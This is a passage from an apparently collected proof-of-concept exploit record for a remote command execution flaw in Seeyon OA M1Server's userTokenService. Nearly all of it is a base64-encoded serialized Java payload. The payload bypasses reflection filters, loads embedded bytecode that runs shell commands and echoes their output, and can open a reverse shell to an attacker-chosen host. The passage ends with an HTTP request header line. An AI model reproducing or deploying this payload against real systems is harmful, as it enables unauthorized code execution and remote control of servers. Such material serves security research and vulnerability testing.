eXRlcygpLG51bGwpOwogIHZhciByZWZsZWN0aW9uRGF0YUZpZWxkID0gY2xhenpBbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJyZWZsZWN0aW9uRGF0YSIpOwogIHVuc2FmZS5wdXRPYmplY3QoY2xhenosdW5zYWZlLm9iamVjdEZpZWxkT2Zmc2V0KHJlZmxlY3Rpb25EYXRhRmllbGQpLG51bGwpOwp9CmZ1bmN0aW9uIGJ5cGFzc1JlZmxlY3Rpb25GaWx0ZXIoKSB7CiAgdmFyIHJlZmxlY3Rpb25DbGFzczsKICB0cnkgewogICAgcmVmbGVjdGlvbkNsYXNzID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoImpkay5pbnRlcm5hbC5yZWZsZWN0LlJlZmxlY3Rpb24iKTsKICB9IGNhdGNoIChlcnJvcikgewogICAgcmVmbGVjdGlvbkNsYXNzID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoInN1bi5yZWZsZWN0LlJlZmxlY3Rpb24iKTsKICB9CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpOwogIHZhciBjbGFzc0J1ZmZlciA9IHJlZmxlY3Rpb25DbGFzcy5nZXRSZXNvdXJjZUFzU3RyZWFtKCJSZWZsZWN0aW9uLmNsYXNzIikucmVhZEFsbEJ5dGVzKCk7CiAgdmFyIHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcyA9IHVuc2FmZS5kZWZpbmVBbm9ueW1vdXNDbGFzcyhyZWZsZWN0aW9uQ2xhc3MsIGNsYXNzQnVmZmVyLCBudWxsKTsKICB2YXIgZmllbGRGaWx0ZXJNYXBGaWVsZCA9IHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJmaWVsZEZpbHRlck1hcCIpOwogIHZhciBtZXRob2RGaWx0ZXJNYXBGaWVsZCA9IHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJtZXRob2RGaWx0ZXJNYXAiKTsKICBpZiAoZmllbGRGaWx0ZXJNYXBGaWVsZC5nZXRUeXBlKCkuaXNBc3NpZ25hYmxlRnJvbShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKSkpIHsKICAgIHVuc2FmZS5wdXRPYmplY3QocmVmbGVjdGlvbkNsYXNzLCB1bnNhZmUuc3RhdGljRmllbGRPZmZzZXQoZmllbGRGaWx0ZXJNYXBGaWVsZCksIGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuSGFzaE1hcCIpLmdldENvbnN0cnVjdG9yKCkubmV3SW5zdGFuY2UoKSk7CiAgfQogIGlmIChtZXRob2RGaWx0ZXJNYXBGaWVsZC5nZXRUeXBlKCkuaXNBc3NpZ25hYmxlRnJvbShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKSkpIHsKICAgIHVuc2FmZS5wdXRPYmplY3QocmVmbGVjdGlvbkNsYXNzLCB1bnNhZmUuc3RhdGljRmllbGRPZmZzZXQobWV0aG9kRmlsdGVyTWFwRmllbGQpLCBqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKS5nZXRDb25zdHJ1Y3RvcigpLm5ld0luc3RhbmNlKCkpOwogIH0KICByZW1vdmVDbGFzc0NhY2hlKGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLmxhbmcuQ2xhc3MiKSk7Cn0KZnVuY3Rpb24gc2V0QWNjZXNzaWJsZShhY2Nlc3NpYmxlT2JqZWN0KXsKICAgIHZhciB1bnNhZmUgPSBnZXRVbnNhZmUoKTsKICAgIHZhciBvdmVycmlkZUZpZWxkID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoImphdmEubGFuZy5yZWZsZWN0LkFjY2Vzc2libGVPYmplY3QiKS5nZXREZWNsYXJlZEZpZWxkKCJvdmVycmlkZSIpOwogICAgdmFyIG9mZnNldCA9IHVuc2FmZS5vYmplY3RGaWVsZE9mZnNldChvdmVycmlkZUZpZWxkKTsKICAgIHVuc2FmZS5wdXRCb29sZWFuKGFjY2Vzc2libGVPYmplY3QsIG9mZnNldCwgdHJ1ZSk7Cn0KZnVuY3Rpb24gZGVmaW5lQ2xhc3MoYnl0ZXMpewogIHZhciBjbHogPSBudWxsOwogIHZhciB2ZXJzaW9uID0gamF2YS5sYW5nLlN5c3RlbS5nZXRQcm9wZXJ0eSgiamF2YS52ZXJzaW9uIik7CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpCiAgdmFyIGNsYXNzTG9hZGVyID0gbmV3IGphdmEubmV0LlVSTENsYXNzTG9hZGVyKGphdmEubGFuZy5yZWZsZWN0LkFycmF5Lm5ld0luc3RhbmNlKGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLm5ldC5VUkwiKSwgMCkpOwogIHRyeXsKICAgIGlmICh2ZXJzaW9uLnNwbGl0KCIuIilbMF0gPj0gMTEpIHsKICAgICAgYnlwYXNzUmVmbGVjdGlvbkZpbHRlcigpOwogICAgZGVmaW5lQ2xhc3NNZXRob2QgPSBqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS5sYW5nLkNsYXNzTG9hZGVyIikuZ2V0RGVjbGFyZWRNZXRob2QoImRlZmluZUNsYXNzIiwgamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoIltCIiksamF2YS5sYW5nLkludGVnZXIuVFlQRSwgamF2YS5sYW5nLkludGVnZXIuVFlQRSk7CiAgICBzZXRBY2Nlc3NpYmxlKGRlZmluZUNsYXNzTWV0aG9kKTsKICAgIC8vIOe7lei/hyBzZXRBY2Nlc3NpYmxlIAogICAgY2x6ID0gZGVmaW5lQ2xhc3NNZXRob2QuaW52b2tlKGNsYXNzTG9hZGVyLCBieXRlcywgMCwgYnl0ZXMubGVuZ3RoKTsKICAgIH1lbHNlewogICAgICB2YXIgcHJvdGVjdGlvbkRvbWFpbiA9IG5ldyBqYXZhLnNlY3VyaXR5LlByb3RlY3Rpb25Eb21haW4obmV3IGphdmEuc2VjdXJpdHkuQ29kZVNvdXJjZShudWxsLCBqYXZhLmxhbmcucmVmbGVjdC5BcnJheS5uZXdJbnN0YW5jZShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS5zZWN1cml0eS5jZXJ0LkNlcnRpZmljYXRlIiksIDApKSwgbnVsbCwgY2xhc3NMb2FkZXIsIFtdKTsKICAgICAgY2x6ID0gdW5zYWZlLmRlZmluZUNsYXNzKG51bGwsIGJ5dGVzLCAwLCBieXRlcy5sZW5ndGgsIGNsYXNzTG9hZGVyLCBwcm90ZWN0aW9uRG9tYWluKTsKICAgIH0KICB9Y2F0Y2goZXJyb3IpewogICAgZXJyb3IucHJpbnRTdGFja1RyYWNlKCk7CiAgfWZpbmFsbHl7CiAgICByZXR1cm4gY2x6OwogIH0KfQpmdW5jdGlvbiBiYXNlNjREZWNvZGVUb0J5dGUoc3RyKSB7CiAgdmFyIGJ0OwogIHRyeSB7CiAgICBidCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5CQVNFNjREZWNvZGVyIikubmV3SW5zdGFuY2UoKS5kZWNvZGVCdWZmZXIoc3RyKTsKICB9IGNhdGNoIChlKSB7CiAgICBidCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuQmFzZTY0IikubmV3SW5zdGFuY2UoKS5nZXREZWNvZGVyKCkuZGVjb2RlKHN0cik7CiAgfQogIHJldHVybiBidDsKfQp2YXIgY29kZT0ieXY2NnZnQUFBQzhCWndvQUlBQ1NCd0NUQndDVUNnQUNBSlVLQUFNQWxnb0FJZ0NYQ2dDWUFKa0tBSmdBbWdvQUlnQ2JDQUNjQ2dBZ0FKMEtBSjRBbndvQW5nQ2dCd0NoQ2dDWUFLSUlBSXdLQUNrQW93Z0FwQWdBcFFjQXBnZ0Fwd2dBcUFjQXFRb0FJQUNxQ0FDckNBQ3NCd0N0Q3dBYkFLNExBQnNBcndnQXNBZ0FzUWNBc2dvQUlBQ3pCd0MwQ2dDMUFMWUlBTGNKQUg0QXVBZ0F1UW9BZmdDNkNBQzdCd0M4Q2dCK0FMMEtBQ2tBdmdnQXZ3a0FMZ0RBQndEQkNnQXVBTUlJQU1NS0FINEF4QW9BSUFERkNBREdDUUIrQU1jSUFNZ0tBQ0FBeVFnQXlnY0F5d2dBekFnQXpRb0FtQURPQ2dEUEFNUUlBTkFLQUNrQTBRZ0EwZ29BS1FEVENBRFVDZ0FwQU5VS0FDa0ExZ2dBMXdvQUtRRFlDQURaQ2dBdUFOb0tBSDRBMndnQTNBb0FmZ0RkQ0FEZUNnRGZBT0FLQUNrQTRRZ0E0Z2dBNHdnQTVBY0E1UW9BVVFDWENnQlJBT1lJQU9jS0FGRUE2QWdBNlFnQTZnZ0E2d2dBN0FvQTdRRHVDZ0R0QU84SEFQQUtBUEVBOGdvQVhBRHpDQUQwQ2dCY0FQVUtBRndBOWdvQVhBRDNDZ0R4QVBnS0FQRUErUW9BT0FEb0NBRDZDZ0FwQUpZSUFQc0tBTzBBL0FjQS9Rb0FMZ0QrQ2dCcUFQOEtBR29BOGdvQThRRUFDZ0JxQVFBS0FHb0JBUW9CQWdFRENnRUNBUVFLQVFVQkJnb0JCUUVIQlFBQUFBQUFBQUF5Q2dDWUFRZ0tBUEVCQ1FvQWFnRUtDQUVMQ2dBNEFKVUlBUXdJQVEwSEFRNEJBQlpqYkdGemN5UnFZWFpoSkd4aGJtY2tVM1J5YVc1bkFRQVJUR3BoZG1FdmJHRnVaeTlEYkdGemN6c0JBQWxUZVc1MGFHVjBhV01CQUFkaGNuSmhlU1JDQVFBR1BHbHVhWFErQVFBREtDbFdBUUFFUTI5a1pRRUFEMHhwYm1WT2RXMWlaWEpVWVdKc1pRRUFDa1Y0WTJWd2RHbHZibk1CQUFsc2IyRmtRMnhoYzNNQkFDVW9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFIWlhobFkzVjBaUUVBSmloTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQUVaWGhsWXdFQUIzSmxkbVZ5YzJVQkFEa29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdUR3BoZG1FdmJHRnVaeTlKYm5SbFoyVnlPeWxNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNCQUFaamJHRnpjeVFCQUFwVGIzVnlZMlZHYVd4bEFRQUhRVFF1YW1GMllRd0JEd0NKQVFBZ2FtRjJZUzlzWVc1bkwwTnNZWE56VG05MFJtOTFibVJGZUdObGNIUnBiMjRCQUI1cVlYWmhMMnhoYm1jdlRtOURiR0Z6YzBSbFprWnZkVzVrUlhKeWIzSU1BUkFCRVF3QWd3RVNEQUNEQUlRSEFSTU1BUlFCRlF3QkZnRVhEQUVZQVJrQkFBZDBhSEpsWVdSekRBRWFBUnNIQVJ3TUFSMEJIZ3dCSHdFZ0FRQVRXMHhxWVhaaEwyeGhibWN2VkdoeVpXRmtPd3dCSVFFUkRBRWlBU01CQUFSb2RIUndBUUFHZEdGeVoyVjBBUUFTYW1GMllTOXNZVzVuTDFKMWJtNWhZbXhsQVFBR2RHaHBjeVF3QVFBSGFHRnVaR3hsY2dFQUhtcGhkbUV2YkdGdVp5OU9iMU4xWTJoR2FXVnNaRVY0WTJWd2RHbHZiZ3dCSkFFWkFRQUdaMnh2WW1Gc0FRQUtjSEp2WTJWemMyOXljd0VBRG1waGRtRXZkWFJwYkM5TWFYTjBEQUVsQVNZTUFSOEJKd0VBQTNKbGNRRUFDMmRsZEZKbGMzQnZibk5sQVFBUGFtRjJZUzlzWVc1bkwwTnNZWE56REFFb0FTa0JBQkJxWVhaaEwyeGhibWN2VDJKcVpXTjBCd0VxREFFckFTd0JBQWxuWlhSSVpXRmtaWElNQUg4QWdBRUFFR3BoZG1FdWJHRnVaeTVUZEhKcGJtY01BSThBaVFFQUEyTnRaQUVBRUdwaGRtRXZiR0Z1Wnk5VGRISnBibWNNQUlvQWl3d0JMUUV1QVFBSmMyVjBVM1JoZEhWekRBRXZBSUFCQUJGcVlYWmhMMnhoYm1jdlNXNTBaV2RsY2d3QWd3RXdBUUFrYjNKbkxtRndZV05vWlM1MGIyMWpZWFF1ZFhScGJDNWlkV1l1UW5sMFpVTm9kVzVyREFDSUFJa01BVEVCTWdFQUNITmxkRUo1ZEdWekRBQ0NBSUFCQUFKYlFnd0JNd0VwQVFBSFpHOVhjbWwwWlFFQUUycGhkbUV2YkdGdVp5OUZlR05sY0hScGIyNEJBQk5xWVhaaExtNXBieTVDZVhSbFFuVm1abVZ5QVFBRWQzSmhjQXdCTkFFMUJ3RTJBUUFBREFFM0FUZ0JBQkJqYjIxdFlXNWtJRzV2ZENCdWRXeHNEQUU1QVJFQkFBVWpJeU1qSXd3Qk9nRTdEQUU4QVQwQkFBRTZEQUUrQVQ4QkFDSmpiMjF0WVc1a0lISmxkbVZ5YzJVZ2FHOXpkQ0JtYjNKdFlYUWdaWEp5YjNJaERBRkFBVUVNQUkwQWpnRUFCVUJBUUVCQURBQ01BSXNCQUFkdmN5NXVZVzFsQndGQ0RBRkRBSXNNQVVRQkVRRUFBM2RwYmdFQUJIQnBibWNCQUFJdGJnRUFGbXBoZG1FdmJHRnVaeTlUZEhKcGJtZENkV1ptWlhJTUFVVUJSZ0VBQlNBdGJpQTBEQUZIQVJFQkFBSXZZd0VBQlNBdGRDQTBBUUFDYzJnQkFBSXRZd2NCU0F3QlNRRktEQUNNQVVzQkFCRnFZWFpoTDNWMGFXd3ZVMk5oYm01bGNnY0JUQXdCVFFGT0RBQ0RBVThCQUFKY1lRd0JVQUZSREFGU0FWTU1BVlFCRVF3QlZRRk9EQUZXQUlRQkFBY3ZZbWx1TDNOb0FRQUhZMjFrTG1WNFpRd0FqQUZYQVFBUGFtRjJZUzl1WlhRdlUyOWphMlYwREFGWUFTWU1BSU1CV1F3QldnRmJEQUZjQVZNSEFWME1BVjRCSmd3Qlh3RW1Cd0ZnREFGaEFUQU1BV0lBaEF3Qll3RmtEQUZsQVNZTUFXWUFoQUVBSFhKbGRtVnljMlVnWlhobFkzVjBaU0JsY25KdmNpd2diWE5uSUMwK0FRQUJJUUVBRTNKbGRtVnljMlVnWlhobFkzVjBaU0J2YXlFQkFBSkJOQUVBQjJadmNrNWhiV1VCQUFwblpYUk5aWE56WVdkbEFRQVVLQ2xNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNCQUJVb1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0tWWUJBQkJxWVhaaEwyeGhibWN2VkdoeVpXRmtBUUFOWTNWeWNtVnVkRlJvY21WaFpBRUFGQ2dwVEdwaGRtRXZiR0Z1Wnk5VWFISmxZV1E3QVFBT1oyVjBWR2h5WldGa1IzSnZkWEFCQUJrb0tVeHFZWFpoTDJ4aGJtY3ZWR2h5WldGa1IzSnZkWEE3QVFBSVoyVjBRMnhoYzNNQkFCTW9LVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFRWjJWMFJHVmpiR0Z5WldSR2FXVnNaQUVBTFNoTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrT3dFQUYycGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrQVFBTmMyVjBRV05qWlhOemFXSnNaUUVBQkNoYUtWWUJBQU5uWlhRQkFDWW9UR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQjJkbGRFNWhiV1VCQUFoamIyNTBZV2x1Y3dFQUd5aE1hbUYyWVM5c1lXNW5MME5vWVhKVFpYRjFaVzVqWlRzcFdnRUFEV2RsZEZOMWNHVnlZMnhoYzNNQkFBUnphWHBsQVFBREtDbEpBUUFWS0VrcFRHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0FRQUpaMlYwVFdWMGFHOWtBUUJBS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuTzF0TWFtRjJZUzlzWVc1bkwwTnNZWE56T3lsTWFtRjJZUzlzWVc1bkwzSmxabXhsWTNRdlRXVjBhRzlrT3dFQUdHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwMWxkR2h2WkFFQUJtbHVkbTlyWlFFQU9TaE1hbUYyWVM5c1lXNW5MMDlpYW1WamREdGJUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQ0dkbGRFSjVkR1Z6QVFBRUtDbGJRZ0VBQkZSWlVFVUJBQVFvU1NsV0FRQUxibVYzU1c1emRHRnVZMlVCQUJRb0tVeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME93RUFFV2RsZEVSbFkyeGhjbVZrVFdWMGFHOWtBUUFWWjJWMFEyOXVkR1Y0ZEVOc1lYTnpURzloWkdWeUFRQVpLQ2xNYW1GMllTOXNZVzVuTDBOc1lYTnpURzloWkdWeU93RUFGV3BoZG1FdmJHRnVaeTlEYkdGemMweHZZV1JsY2dFQUJtVnhkV0ZzY3dFQUZTaE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc3BXZ0VBQkhSeWFXMEJBQXB6ZEdGeWRITlhhWFJvQVFBVktFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bGFBUUFIY21Wd2JHRmpaUUVBUkNoTWFtRjJZUzlzWVc1bkwwTm9ZWEpUWlhGMVpXNWpaVHRNYW1GMllTOXNZVzVuTDBOb1lYSlRaWEYxWlc1alpUc3BUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdBUUFGYzNCc2FYUUJBQ2NvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1Z0TWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBZDJZV3gxWlU5bUFRQW5LRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxNYW1GMllTOXNZVzVuTDBsdWRHVm5aWEk3QVFBUWFtRjJZUzlzWVc1bkwxTjVjM1JsYlFFQUMyZGxkRkJ5YjNCbGNuUjVBUUFMZEc5TWIzZGxja05oYzJVQkFBWmhjSEJsYm1RQkFDd29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2VTNSeWFXNW5RblZtWm1WeU93RUFDSFJ2VTNSeWFXNW5BUUFSYW1GMllTOXNZVzVuTDFKMWJuUnBiV1VCQUFwblpYUlNkVzUwYVcxbEFRQVZLQ2xNYW1GMllTOXNZVzVuTDFKMWJuUnBiV1U3QVFBb0tGdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlRY205alpYTnpPd0VBRVdwaGRtRXZiR0Z1Wnk5UWNtOWpaWE56QVFBT1oyVjBTVzV3ZFhSVGRISmxZVzBCQUJjb0tVeHFZWFpoTDJsdkwwbHVjSFYwVTNSeVpXRnRPd0VBR0NoTWFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJUc3BWZ0VBREhWelpVUmxiR2x0YVhSbGNnRUFKeWhNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNwVEdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5T3dFQUIyaGhjMDVsZUhRQkFBTW9LVm9CQUFSdVpYaDBBUUFPWjJWMFJYSnliM0pUZEhKbFlXMEJBQWRrWlhOMGNtOTVBUUFuS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3lsTWFtRjJZUzlzWVc1bkwxQnliMk5sYzNNN0FRQUlhVzUwVm1Gc2RXVUJBQllvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3U1NsV0FRQVBaMlYwVDNWMGNIVjBVM1J5WldGdEFRQVlLQ2xNYW1GMllTOXBieTlQZFhSd2RYUlRkSEpsWVcwN0FRQUlhWE5EYkc5elpXUUJBQk5xWVhaaEwybHZMMGx1Y0hWMFUzUnlaV0Z0QVFBSllYWmhhV3hoWW14bEFRQUVjbVZoWkFFQUZHcGhkbUV2YVc4dlQzVjBjSFYwVTNSeVpXRnRBUUFGZDNKcGRHVUJBQVZtYkhWemFBRUFCWE5zWldWd0FRQUVLRW9wVmdFQUNXVjRhWFJXWVd4MVpRRUFCV05zYjNObEFDRUFmZ0FpQUFBQUFnQUlBSDhBZ0FBQkFJRUFBQUFBQUFnQWdnQ0FBQUVBZ1FBQUFBQUFCZ0FCQUlNQWhBQUNBSVVBQUFRUkFBZ0FFUUFBQXRFcXR3QUd1QUFIdGdBSVRDdTJBQWtTQ3JZQUMwMHNCTFlBREN3cnRnQU53QUFPd0FBT1RnTTJCQlVFTGI2aUFxTXRGUVF5T2dVWkJjY0FCcWNDanhrRnRnQVBPZ1laQmhJUXRnQVJtZ0FOR1FZU0VyWUFFWm9BQnFjQ2NSa0Z0Z0FKRWhPMkFBdE5MQVMyQUF3c0dRVzJBQTA2QnhrSHdRQVVtZ0FHcHdKT0dRZTJBQWtTRmJZQUMwMHNCTFlBREN3WkI3WUFEVG9IR1FlMkFBa1NGcllBQzAybkFCWTZDQmtIdGdBSnRnQVl0Z0FZRWhhMkFBdE5MQVMyQUF3c0dRZTJBQTA2QnhrSHRnQUp0Z0FZRWhtMkFBdE5wd0FRT2dnWkI3WUFDUkladGdBTFRTd0V0Z0FNTEJrSHRnQU5PZ2NaQjdZQUNSSWF0Z0FMVFN3RXRnQU1MQmtIdGdBTndBQWJ3QUFiT2dnRE5na1ZDUmtJdVFBY0FRQ2lBYWdaQ0JVSnVRQWRBZ0E2Q2hrS3RnQUpFaDYyQUF0TkxBUzJBQXdzR1FxMkFBMDZDeGtMdGdBSkVoOER2UUFndGdBaEdRc0R2UUFpdGdBak9nd1pDN1lBQ1JJa0JMMEFJRmtEc2dBbHh3QVBFaWE0QUNkWnN3QWxwd0FHc2dBbFU3WUFJUmtMQkwwQUlsa0RFaWhUdGdBandBQXBPZzBaRGNjQUJxY0JKU29aRGJZQUtyWUFLem9PR1F5MkFBa1NMQVM5QUNCWkE3SUFMVk8yQUNFWkRBUzlBQ0paQTdzQUxsa1JBTWkzQUM5VHRnQWpWeW9TTUxZQU1Ub1BHUSsyQURJNkJ4a1BFak1HdlFBZ1dRT3lBRFRIQUE4U05iZ0FKMW16QURTbkFBYXlBRFJUV1FTeUFDMVRXUVd5QUMxVHRnQTJHUWNHdlFBaVdRTVpEbE5aQkxzQUxsa0R0d0F2VTFrRnV3QXVXUmtPdnJjQUwxTzJBQ05YR1F5MkFBa1NOd1M5QUNCWkF4a1BVN1lBSVJrTUJMMEFJbGtER1FkVHRnQWpWNmNBWWpvUEtoSTV0Z0F4T2hBWkVCSTZCTDBBSUZrRHNnQTB4d0FQRWpXNEFDZFpzd0EwcHdBR3NnQTBVN1lBTmhrUUJMMEFJbGtER1E1VHRnQWpPZ2NaRExZQUNSSTNCTDBBSUZrREdSQlR0Z0FoR1F3RXZRQWlXUU1aQjFPMkFDTlhwd0FYaEFrQnAvNVNwd0FJT2dhbkFBT0VCQUduL1Z5eEFBZ0Fsd0NpQUtVQUZ3REZBTk1BMWdBWEFkQUNWd0phQURnQU5nQTdBc1VBT0FBK0FGa0N4UUE0QUZ3QWZBTEZBRGdBZndLNUFzVUFPQUs4QXNJQ3hRQTRBQUVBaGdBQUFPNEFPd0FBQUEwQUJBQU9BQXNBRHdBVkFCQUFHZ0FSQUNZQUV3QXdBQlFBTmdBV0FENEFGd0JGQUJnQVhBQVpBR2NBR2dCc0FCc0FkQUFjQUg4QUhRQ0tBQjRBandBZkFKY0FJUUNpQUNRQXBRQWlBS2NBSXdDNEFDVUF2UUFtQU1VQUtBRFRBQ3NBMWdBcEFOZ0FLZ0RqQUN3QTZBQXRBUEFBTGdEN0FDOEJBQUF3QVE0QU1RRWRBRElCS0FBekFUTUFOQUU0QURVQlFBQTJBVmtBTndHU0FEZ0Jsd0E1QVpvQU93R2xBRHdCMEFBK0FkZ0FQd0hmQUVBQ05RQkJBbGNBUmdKYUFFSUNYQUJEQW1RQVJBS1hBRVVDdVFCSEFyd0FNUUxDQUVzQ3hRQkpBc2NBU2dMS0FCTUMwQUJOQUljQUFBQUVBQUVBT0FBQkFJZ0FpUUFDQUlVQUFBQTVBQUlBQXdBQUFCRXJ1QUFCc0UyNEFBZTJBRHNydGdBOHNBQUJBQUFBQkFBRkFBSUFBUUNHQUFBQURnQURBQUFBVndBRkFGZ0FCZ0JaQUljQUFBQUVBQUVBQWdBQkFJb0Fpd0FCQUlVQUFBQ1BBQVFBQXdBQUFGY3J4Z0FNRWowcnRnQSttUUFHRWord0s3WUFRRXdyRWtHMkFFS1pBQ2dyRWtFU1BiWUFReEpFdGdCRlRTeStCWjhBQmhKR3NDb3NBeklzQkRLNEFFZTJBRWl3S2lzU1FSSTl0Z0JERWtrU1BiWUFRN1lBU3JBQUFBQUJBSVlBQUFBbUFBa0FBQUJqQUEwQVpBQVFBR1lBRlFCbkFCNEFhUUFzQUdvQU1nQnJBRFVBYlFCREFHOEFBUUNNQUlzQUFRQ0ZBQUFCeWdBRUFBa0FBQUVxRWt1NEFFeTJBRTFOSzdZQVFFd0JUZ0U2QkN3U1RyWUFFWmtBUUNzU1Q3WUFFWmtBSUNzU1VMWUFFWm9BRjdzQVVWbTNBRklydGdCVEVsUzJBRk8yQUZWTUJyMEFLVmtERWloVFdRUVNWbE5aQlN0VE9nU25BRDByRWsrMkFCR1pBQ0FyRWxDMkFCR2FBQmU3QUZGWnR3QlNLN1lBVXhKWHRnQlR0Z0JWVEFhOUFDbFpBeEpZVTFrRUVsbFRXUVVyVXpvRXVBQmFHUVMyQUZ0T3V3QmNXUzIyQUYyM0FGNFNYN1lBWURvRkdRVzJBR0daQUFzWkJiWUFZcWNBQlJJOU9nYTdBRnhaTGJZQVk3Y0FYaEpmdGdCZ09nVzdBRkZadHdCU0dRYTJBRk1aQmJZQVlaa0FDeGtGdGdCaXB3QUZFajIyQUZPMkFGVTZCaGtHT2djdHhnQUhMYllBWkJrSHNEb0ZHUVcyQUdVNkJpM0dBQWN0dGdCa0dRYXdPZ2d0eGdBSExiWUFaQmtJdndBRUFKTUEvZ0VKQURnQWt3RCtBUjBBQUFFSkFSSUJIUUFBQVIwQkh3RWRBQUFBQVFDR0FBQUFiZ0FiQUFBQWN3QUpBSFFBRGdCMUFCQUFkZ0FUQUhjQUhBQjRBQzRBZVFCQ0FIc0FXUUI5QUdzQWZnQi9BSUFBa3dDREFKd0FoQUN1QUlVQXdnQ0dBTlFBaHdENkFJZ0EvZ0NNQVFJQWpRRUdBSWdCQ1FDSkFRc0FpZ0VTQUl3QkZnQ05BUm9BaWdFZEFJd0JJd0NOQUFFQWpRQ09BQUVBaFFBQUFZTUFCQUFNQUFBQTh4Skx1QUJNdGdCTkVrNjJBQkdhQUJDN0FDbFpFbWEzQUdkT3B3QU51d0FwV1JKb3R3Qm5UcmdBV2kyMkFHazZCTHNBYWxrckxMWUFhN2NBYkRvRkdRUzJBRjA2QmhrRXRnQmpPZ2NaQmJZQWJUb0lHUVMyQUc0NkNSa0Z0Z0J2T2dvWkJiWUFjSm9BWUJrR3RnQnhuZ0FRR1FvWkJyWUFjcllBYzZmLzdoa0h0Z0J4bmdBUUdRb1pCN1lBY3JZQWM2Zi83aGtJdGdCeG5nQVFHUWtaQ0xZQWNyWUFjNmYvN2hrS3RnQjBHUW0yQUhRVUFIVzRBSGNaQkxZQWVGZW5BQWc2QzZmL25oa0V0Z0JrR1FXMkFIbW5BQ0JPdXdCUldiY0FVaEo2dGdCVExiWUFlN1lBVXhKOHRnQlR0Z0JWc0JKOXNBQUNBTGdBdmdEQkFEZ0FBQURRQU5NQU9BQUJBSVlBQUFCdUFCc0FBQUNiQUJBQW5BQWRBSjRBSndDZ0FEQUFvUUErQUtJQVV3Q2pBR0VBcEFCcEFLVUFjUUNtQUg0QXFBQ0dBS2tBa3dDckFKc0FyQUNvQUs0QXJRQ3ZBTElBc0FDNEFMSUF2Z0N6QU1FQXRBRERBTFVBeGdDM0FNc0F1QURRQUxzQTB3QzVBTlFBdWdEd0FMd0FDQUNQQUlrQUFnQ0ZBQUFBTWdBREFBSUFBQUFTS3JnQUFiQk11d0FEV1N1MkFBUzNBQVcvQUFFQUFBQUVBQVVBQWdBQkFJWUFBQUFHQUFFQUFBQTNBSUVBQUFBQUFBRUFrQUFBQUFJQWtRPT0iOwpjbHogPSBkZWZpbmVDbGFzcyhiYXNlNjREZWNvZGVUb0J5dGUoY29kZSkpOwpjbHoubmV3SW5zdGFuY2UoKTt0AARldmFsdXEAfgAbAAAAAXEAfgAjc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4eHg=)}}\n3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/致远OA M1Server userTokenService 远程命令执行漏洞.md"}
    965. 

